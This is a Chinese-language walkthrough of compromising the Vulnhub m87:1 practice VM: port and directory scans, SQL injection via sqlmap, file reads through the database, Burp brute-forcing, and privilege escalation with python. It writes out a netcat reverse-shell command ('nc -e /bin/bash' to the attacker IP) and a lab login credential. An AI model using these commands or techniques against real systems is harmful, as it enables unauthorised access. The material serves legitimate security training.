Vulnhub靶机m87:1渗透

靶机介绍
官方下载地址:http://www.vulnhub.com/entry/m87-1,595/
靶机难度容易,拥有两个用户,网络适配器是NAT模式自动分配IP地址
Vulnhub靶机m87:1渗透_第1张图片
运行环境
靶机:网络设为NAT,IP地址:192.168.174.138
攻击机:同网段下的kali linux,IP地址:192.168.174.135
开始渗透
运行靶机
Vulnhub靶机m87:1渗透_第2张图片
靶机运行之后就提示了IP地址,端口和一个域名
扫一下端口看是否有其他存在
Vulnhub靶机m87:1渗透_第3张图片
Vulnhub靶机m87:1渗透_第4张图片
Vulnhub靶机m87:1渗透_第5张图片
扫一下80端口的目录
Vulnhub靶机m87:1渗透_第6张图片
开始访问得到的这些目录
80端口的首页
Vulnhub靶机m87:1渗透_第7张图片
admin
Vulnhub靶机m87:1渗透_第8张图片
/admin/backup/
Vulnhub靶机m87:1渗透_第9张图片
9090端口首页
Vulnhub靶机m87:1渗透_第10张图片
找到了四个登录页面
http://192.168.174.138/admin/ 输入参数id=’ 出现报错 id=1的时候回显正常 说明存在注入点
Vulnhub靶机m87:1渗透_第11张图片
使用sqlmap跑一下,确实存在注入点
Vulnhub靶机m87:1渗透_第12张图片
在db的数据库的users表当中找到了用户名密码
Vulnhub靶机m87:1渗透_第13张图片
经过多次尝试这里的用户名密码是无法登录任何一个登录页面
但是数据库存在flie权限,可以读取文件
Vulnhub靶机m87:1渗透_第14张图片
Vulnhub靶机m87:1渗透_第15张图片
查看passwd
Vulnhub靶机m87:1渗透_第16张图片
在这里插入图片描述
这里看到确实只存在两个用户
接下就不知道怎么办了,最后看了某一位大佬的视频才做出来的,将所有用户和密码收集起来使用burp进行爆破,
最后使用charlotte:15The4Dm1n4L1f3登录9090端口的首页
Vulnhub靶机m87:1渗透_第17张图片
Vulnhub靶机m87:1渗透_第18张图片
在终端选项里面发现可以执行系统命令,接下来就是提权了,有好几个方法可以提权
Vulnhub靶机m87:1渗透_第19张图片
第一个方法:
执行命令反弹shell到本地 nc -e /bin/bash 192.168.174.135 4444
Vulnhub靶机m87:1渗透_第20张图片
在这里插入图片描述
使用python打开一个终端
在这里插入图片描述
查看old发现是python2.7可以利用os模块调用本地的root的shell
Vulnhub靶机m87:1渗透_第21张图片
Vulnhub靶机m87:1渗透_第22张图片
第二个方法:
利用python相关的提权命令进行提权
Vulnhub靶机m87:1渗透_第23张图片
Vulnhub靶机m87:1渗透_第24张图片
也可以不反弹shell到本地直接在浏览器执行提权命令
Vulnhub靶机m87:1渗透_第25张图片
Vulnhub靶机m87:1渗透_第26张图片
这个靶机到这里就渗透结束了,难点在于获取用户名和密码

你可能感兴趣的:(安全,kali,linux,渗透测试)